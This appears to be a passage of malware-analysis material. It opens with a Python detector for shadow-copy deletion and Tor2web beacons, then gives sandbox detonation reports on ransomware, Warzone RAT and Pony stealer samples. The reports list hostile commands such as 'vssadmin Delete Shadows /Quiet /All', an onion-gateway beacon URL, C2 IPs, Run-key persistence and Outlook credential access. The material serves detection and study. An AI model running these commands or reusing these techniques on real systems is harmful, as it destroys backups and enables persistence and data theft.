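from urllib.parse import parse_qs, urlsplit

# Assumption: onion.link is the gateway seen in this report; the others are
# common Tor2web-style gateway suffixes added for illustration.
TOR2WEB_SUFFIXES = (".onion.link", ".onion.to", ".onion.ws", ".onion.pet", ".onion.cab")
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def basename(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()


@dataclass
class Alert:
    rule: str
    pid: int
    chain: List[str]                                   # "pid:image" from the process up to the root
    details: Dict[str, str] = field(default_factory=dict)


def tokens(cmdline: str) -> List[str]:
    """Lower-cased, quote-stripped whitespace tokens (enough for the rules below)."""
    return [t.strip('"').lower() for t in cmdline.split()]


def deletes_shadow_copies(cmdline: str) -> bool:
    """True if the command line invokes vssadmin with both 'delete' and 'shadows' after it."""
    toks = tokens(cmdline)
    for i, t in enumerate(toks):
        if t.rsplit("\\", 1)[-1] in ("vssadmin", "vssadmin.exe"):
            rest = set(toks[i + 1:])
            return "delete" in rest and "shadows" in rest
    return False


def gateway_beacon(ev: ProcEvent, parent: Optional[ProcEvent]) -> Optional[Dict[str, str]]:
    """A browser handed a Tor2web-gateway URL by a non-browser parent; returns host, path and query params."""
    if ev.basename not in BROWSERS or parent is None or parent.basename in BROWSERS:
        return None
    for m in URL_RE.finditer(ev.cmdline):
        parts = urlsplit(m.group(0).strip('"'))
        host = parts.hostname or ""
        if host.endswith(TOR2WEB_SUFFIXES):
            details = {"host": host, "path": parts.path}
            details.update({k: v[0] for k, v in parse_qs(parts.query).items()})
            return details
    return None


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # stop at an unknown parent or a PID cycle
        seen.add(pid)
        ev = by_pid[pid]
        chain.append(f"{ev.pid}:{ev.basename}")
        pid = ev.ppid
    return chain


def detect(events: List[ProcEvent]) -> List[Alert]:
    by_pid = {e.pid: e for e in events}
    alerts: List[Alert] = []
    for ev in events:
        if deletes_shadow_copies(ev.cmdline):
            alerts.append(Alert("shadow_copy_deletion", ev.pid, ancestry(ev.pid, by_pid)))
        details = gateway_beacon(ev, by_pid.get(ev.ppid))
        if details:
            alerts.append(Alert("tor2web_beacon", ev.pid, ancestry(ev.pid, by_pid), details))
    return alerts


# Constructed sample: PIDs and command lines from the process list above.
ENCRYPTOR = r"C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe"
BEACON_URL = ("http://kqd2eml2kjib53oe.onion.link/vict?cust=9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581"
              "&guid=bf99bef1-312f-4726-8597-70228ef05e99")
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),           # constructed root
    ProcEvent(2316, 1000, ENCRYPTOR, f'"{ENCRYPTOR}"'),
    ProcEvent(2608, 2316, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C vssadmin Delete Shadows /Quiet /All'),
    ProcEvent(2668, 2316, r"C:\Program Files\Internet Explorer\iexplore.exe",
              f'"C:\\Program Files\\Internet Explorer\\iexplore.exe" {BEACON_URL}'),
    ProcEvent(2356, 2608, r"C:\Windows\SysWOW64\vssadmin.exe", "vssadmin Delete Shadows /Quiet /All"),
    ProcEvent(396, 2668, r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
              r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:2'),
    ProcEvent(4100, 4000, r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),  # constructed, benign
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a.rule, a.pid, " <- ".join(a.chain), a.details)
```

The deletion rule fires twice, once on the cmd.exe wrapper and once on vssadmin.exe itself, which is deliberate: the wrapper line is still visible when vssadmin execution is blocked by policy. A "vssadmin list shadows" run by an administrator does not match, and the SCODEF child is ignored because its parent is already a browser.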

Network

Country Destination Domain Proto
US 8.8.8.8:53 kqd2eml2kjib53oe.onion.link udp
AU 103.198.0.111:80 kqd2eml2kjib53oe.onion.link tcp
AU 103.198.0.111:80 kqd2eml2kjib53oe.onion.link tcp
AU 103.198.0.111:80 kqd2eml2kjib53oe.onion.link tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/2316-0-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-102-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-958-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-2803-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-3993-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Program Files\Common Files\Microsoft Shared\ink\readme_liesmich_encryptor_raas.txt

MD5 e05a483e9a949fcda524cb8b4ab8ba36
SHA1 398774b20f4b26c51088d552dcceeaea55302be0
SHA256 f07bdef5a164e4484c0a3d9315bf94792503543877863ea0e57e955f9d9dae9d
SHA512 d52bde031c3f7926afe042c85596246789b5817fde835f6309c5b5874477b109cd4d976209c28d469285a2b99b6ae5a0e4a3d6dc7ef2eee69e7dd1a579458368

memory/2316-4367-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2316-4599-0x0000000000400000-0x000000000041F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabAA92.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarAB72.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 722d8f52a4f387cffee97f9b2160b05b
SHA1 f189a57167e9e526f1619b71f7cb77a730b3ee2c
SHA256 0cf31829390341fb0704d4a74c47c7ed47c3ed9e32045198644339670121481f
SHA512 9ffeeb065e46817e3571c7a3f1828f4a3decae320bf68ce7d8a81888c2709244a6092571edcda6e160dca57566f953adf757280914c63fb56f0f203287522f9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6fc1ae52fbbb2c8c363f8d98ef668647
SHA1 650cfe49244ef95b44c6ae698d229a263e339dd5
SHA256 ee471558df686d0a06ea8c7be012d16232d138e7ca02943c7b4b0c86ad94b61f
SHA512 3a020d17b21e182a121ad141768b4961df096824da860749ed908a005e8d0e88f3b308bf0cf45b521cf846a263d45553b539d20d144b0b0d88eab834841e2edd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a9bb4e1022c6fab16712f6fa74b50cca
SHA1 161f9f2f8f3c02ab0ded0578e753c3cff697a501
SHA256 ceca9d7d481cbd7120f5f950d94e93a2c62f584b86fdaf0b30fdd5266b1e49b1
SHA512 b4c34097773507ef2c1748dc30bc34fd4f88b2ab5cd5eabef035f30efad20425ec5e4a1f6c79ac1a9d84c8a7f0e978e214c96a5064d4291a2b618a4076043092

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f69932549e545781bd413734ad00274a
SHA1 cd118e066b5e670543775521c8eded8bd4492ee8
SHA256 ba21c33595f78922828ddb7af0dd05a201641a78b8d6a8e9e1bd4f6dc8c741b0
SHA512 a3e0b7f8899374a018ae6a3b770d70c1f360dd31342bb1fc9208e1845fd47eca55666e16a0472d91935afca2b050fa5ffaa25832319681e0c364087a3a56fbc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d7ff920e2974c03510e1c981e82e6a44
SHA1 27385d20adf2648d5a25d450cca5f25e956ab51e
SHA256 f24d861298a887b29221de776b2fc8528e8fcbfa05615619035d8df861c29bd9
SHA512 2f7b4eac34143035cca48ade0eded400d2d652f9f7514eadae7aacda2fb48d5ff278fe3d5991b8053d71040e25c9a188d3181825e31edf6faa5e972c375e6d36

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5db9f6e33202891d538aa1a6f13319a2
SHA1 8d76049503f9e665f0c2fc261af1cd0b1d74386d
SHA256 e1ff9df5fdc2cc5bfffc19c567a4a213adb8c7380cbb3b329c9434ea06c012d8
SHA512 2c395a21039af442672f4cb797506f9ac3799aafca8d159c961fcd08f6987eb7993553e4a288fa282cd1df5ce3109576cd101fc8185c1cc9d665cb3c27dbaa80

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 470f737a652430a6b499b4aa1a2bcd5b
SHA1 fd85578f0c3b7bab81f28c462287fdccba1d7c48
SHA256 db273bf642c98eb0f549bc7921db0a1a0ce465328c6a86166f022d55c3dfab51
SHA512 b50948ab52e084f3e45286700d396cc45d86f27e026c4ad93de75d864bd98d9ff60ac4d1b3210dec2d9f3ccfb79be38cf2954aba41bdc90d732881a4ca604233

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d6263f9671e5146a1225d0fcb6d0c116
SHA1 3ca9f2d3a715f88ee2012595ae4b2a7ce20d6017
SHA256 91ff2a1ad88644c39c095c8bbbb590926bb3ba61ccf3b09b77a5ab4af8a99d6d
SHA512 bcc2457f2af69911ff22727779ca3d02e1995d57be6b648f1e527c56e59bb983628a827548345263da94588f863372d3eb785445f2f80ab6564e66757b78676e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2bfe5ef9cb9b115683ed54e7b697be95
SHA1 41b3a4ac5e2ff6547d672d910c002286182372ac
SHA256 ed9e20a48dad20c11b5eb4d9d7f9e9e92dabddb7e188862632eb9b71de1cdd9e
SHA512 da483262952c4e9d35127403c789d7b85bf1ae86647e8d13d60d35e6949b69fef75f64671cab1e5a33f1d26390660326917371429d5bfaf217cccbbffd6375f7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 77d1b6ab9dce7d443094cc749fee6f97
SHA1 e5f1880a8f466c195d196ffcba9d00011f1b60e7
SHA256 d8dff5350b9e67b3e52da6304d6fe554ebf6bc64a3d2c25e2bceb1160b2d8bed
SHA512 d63411252f9352bab679923a3b2011db31ce5986e7493f171ed0a4d9df9d650c440558d988fe51dd1e2aa45e147f063cc4099659ec7620749cccd5ffdb3ebe64

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3e32e99ae25948d82cdcd10ab15569df
SHA1 7b96e8efc1a454df23d043ec20845e2cff8abadc
SHA256 4533ef6c0cc26448652639ab8ad49f4b4498f99ae4eeba454d164a5374aa074f
SHA512 d5a246fb1e1eea70bac98c01ce69a2027281a1808e07899612697f08f3d5473133dad065fb6d1cf0f78d7e8347167bef5c0fc0754b7b9355b988b1a7411815b1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 92bf9d0b6bca10cf752525ef93d8d87c
SHA1 00aacb366be444ee497f0a9210eeed94451f5c63
SHA256 9fa877b733ba1a902d4506a3c24e41cab643e52a3f6092376326ced353b084c2
SHA512 27251121954342b9ef57c72c3f15f555a24261948fbed343e168d7e0a7af3c3c51ffb1510b782c4634daf13353daa2e44df1e97ad2f83e894d5704db1666f50a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2ca4f35a4712ac405bafe29808643639
SHA1 550515683e94a438bb6ea20250f0e16ad863634d
SHA256 c474fb59c5839b0cdb4b68bfded7be5593c8b99f7aca6590b719d58d61077b98
SHA512 040c1227e59607ee6c840f9e2e72b55414175b20adf5b3224a52241fd4c75e573cf5c8d713ecfff58ea97edef4f2a4399a923e3a3c7d0199e109e1b4d654b773

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56f883c112e675626203815b82c6218a
SHA1 433764258ae1f57bc19029c6b790f7316b19901f
SHA256 a012619a1675a072145ad30714990a2b60910e4a2a6aedfc1240ac4f1dbb8490
SHA512 1952b191e5eff3246d7761ac91f5c00d1ab97243629b3e7c558508a7cd0d0ea9b9f74fc95b08ce5a308b3d0c0e964762ce899e2b58e8463e4dbb7cfc43e18a8f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 3ac274f84763e4dfc8b703a4eb92f441
SHA1 07f62a694c54e8b58db4b1c2821b20894867ed13
SHA256 5a73d962e4af6e847b0502c5e1d64f7e22e44daa9f5becbe8512e3a56ed6ac6a
SHA512 4c5b8260a2c1ba0a200137f88f7305ef65d22cf3c8094d1191484deb6562f702a498942e2487446d0a8d298afc76515638e019420d66e2479990e9b0ba4c6a0b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 06ef914198d488c0bcbabc0fa4e583a1
SHA1 e4356386f1cd0ad51d63d33ef542ab3d0649183f
SHA256 386ba1cd756f1ea15e922eafe942ce8f7a7ac97029e5383b52f6c7443a30be18
SHA512 a020c2efefb1ba69dc83011dc21792dbbd8d34b64bb71ed2eae8b3e3506823b82223594d9ae1ab54ef6527671257a0df65206892cca0cf77d0d38ce73727e809

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ab6d5d0bf6ca4de7dc7a682658c85235
SHA1 9e9eb41b09fd7d94812329bccbc2f04f48335d56
SHA256 5e2f0983036eb515f7d746c73e72c076f6172adfcf9966f88f9a22c77d93f045
SHA512 4845f055cf76f801f9fc6d5eb09367b039779b0038745b9308ebf929b318d8816b8b23093857ae1b311af104a07b511ddefa5f6e5e2a8a8652ee384b0f3b3628

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1d052f68eb2ab3ca932377e0e72252ca
SHA1 5cdb94ac70b777270b56babfd5614e419d701904
SHA256 5ad6018e97eda29eaa6c4299ace648baa1b1084039dc5a44a5acde2de781145f
SHA512 b01b49389601d5e3094d5b9d40d7d2753e9d9bf2fd18f548c66d86dbdb0223a2ce5d7e4f6159a88ba1cd89de4ce1e42ceb2a9c2db23dcd7341360f6298c84536

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 16c5e5ab90e4981c78b4aa148e4fa770
SHA1 813fd4d48d7a18003f822fd4b623ae9d6c7b9c67
SHA256 e396507ae838844433c0ef57a962df27ecedd3730695830013784acf689422d0
SHA512 8aacc92db3118d4963d7a6859cda7ffd8a3ad7fc754e0c6619171cf365927c4f3b9db8a2ecf1d774a44cc8bf37fc7319fa602f44225b73b82a94b5db6af28fa5

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241010-en

Max time kernel

363s

Max time network

368s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f213e54c8520e7458751020edf15a5ea.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f213e54c8520e7458751020edf15a5ea.exe

"C:\Users\Admin\AppData\Local\Temp\f213e54c8520e7458751020edf15a5ea.exe"

Network

N/A

Files

memory/2864-0-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp

memory/2864-1-0x0000000000970000-0x00000000009AA000-memory.dmp

memory/2864-2-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2864-3-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2864-4-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

memory/2864-5-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp

memory/2864-6-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20241023-en

Max time kernel

591s

Max time network

593s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe"

Signatures

WarzoneRat, AveMaria

rat infostealer warzonerat

Warzonerat family

warzonerat

Warzone RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\images.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe" C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\images.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe N/A
N/A N/A C:\ProgramData\images.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe

"C:\Users\Admin\AppData\Local\Temp\f2c8eee2cd88b834e9d4c0eb4930f03f.exe"

C:\ProgramData\images.exe

"C:\ProgramData\images.exe"

Network

Country Destination Domain Proto
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp
GB 195.140.213.91:5200 tcp

Files

memory/2104-0-0x0000000001F20000-0x0000000001F5C000-memory.dmp

memory/2104-1-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-2-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-3-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-4-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-6-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2104-5-0x0000000001F20000-0x0000000001F5C000-memory.dmp

memory/2104-7-0x0000000000400000-0x0000000000483000-memory.dmp

\ProgramData\images.exe

MD5 f2c8eee2cd88b834e9d4c0eb4930f03f
SHA1 a47b40f642bb78757b2de40344f555dc48a5a12f
SHA256 0cc95d376267ae78c309fd5f60f3083670b1c2616b6e3e2eec8810fa273c24be
SHA512 3be3760ff7b308017d820307af224bff1c5d49ae3ea71062792816477b071af9cb106e5f2ec970da022b7a055010b91b47d57e571e18643f808787538386831d

memory/2104-13-0x0000000000400000-0x0000000000483000-memory.dmp

memory/2836-14-0x0000000000290000-0x00000000002CC000-memory.dmp

memory/2836-15-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-16-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-17-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-18-0x0000000000400000-0x0000000000483000-memory.dmp

memory/2836-19-0x0000000000200000-0x0000000000201000-memory.dmp

memory/2836-20-0x0000000000400000-0x0000000000483000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:06

Platform

win7-20240903-en

Max time kernel

52s

Max time network

360s

Command Line

"C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\DirectX = "C:\\Users\\Admin\\AppData\\Roaming\\DirectX.exe" C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\DirectX.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Users\Admin\AppData\Roaming\DirectX.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 800 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2696 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe

"C:\Users\Admin\AppData\Local\Temp\DUMP_00A10000-00A1D000.exe.ViR.exe"

C:\Users\Admin\AppData\Roaming\DirectX.exe

"C:\Users\Admin\AppData\Roaming\DirectX.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c aaa.bat

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im DUMP_00A10000-00A1D000.exe.ViR.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 tangotangocash.com udp

Files

memory/800-0-0x0000000000400000-0x0000000000419000-memory.dmp

\Users\Admin\AppData\Roaming\DirectX.exe

MD5 6152709e741c4d5a5d793d35817b4c3d
SHA1 05ae9c76f8f85ad2247c06d26a88bbbcfff4d62e
SHA256 2c4c8066a1a7dfdf42c57ff4f9016f1ba05bcb004ff8b0ffc0989165d2ad30e2
SHA512 1e5ebd53ac942b0f06f759f936efebeeb9a74062647cd978d5112720f772f607b12ee20c02ab838104a7a947fef2fde79b0db944286d8daf2e6e6d16e10b9390

memory/2676-11-0x0000000000400000-0x0000000000419000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aaa.bat

MD5 3e59a76bf84cb9d1a8585c17cda9b949
SHA1 60fdb9e6bf1154aad3a332ad5657a9d62a5be73a
SHA256 21060b57f9392d62259c274427c4bb6caf19b228716d691f44a26958b3620d5f
SHA512 01bd3726c30e304dd712d302a9081052b50a85a28c586458b691e748b1867e85fa679e58db304793a18f554b8a8c17af00bd38e795d3fdb6b0f5a873f80b5303

memory/800-21-0x0000000000400000-0x0000000000419000-memory.dmp

memory/2676-24-0x0000000000400000-0x0000000000419000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241010-en

Max time kernel

362s

Max time network

368s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dffde400ad3d2af2bbd61c58bed9dcf7e3e37cec6210c9841d8ed5dc9117343d.exe"

Signatures

CrypVault

ransomware crypvault

Crypvault family

crypvault

Pony family

pony

Pony,Fareit

rat spyware stealer pony

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAULT.hta C:\Windows\SysWOW64\svchost.exe N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\svchost.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Windows\SysWOW64\svchost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Fontcore = "C:\\Windows\\SysWOW64\\Fontcore\\Fontcore.lnk" C:\Windows\SysWOW64\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Fontcore = "C:\\Windows\\SysWOW64\\Fontcore\\Fontcore.lnk" C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in System32 directory

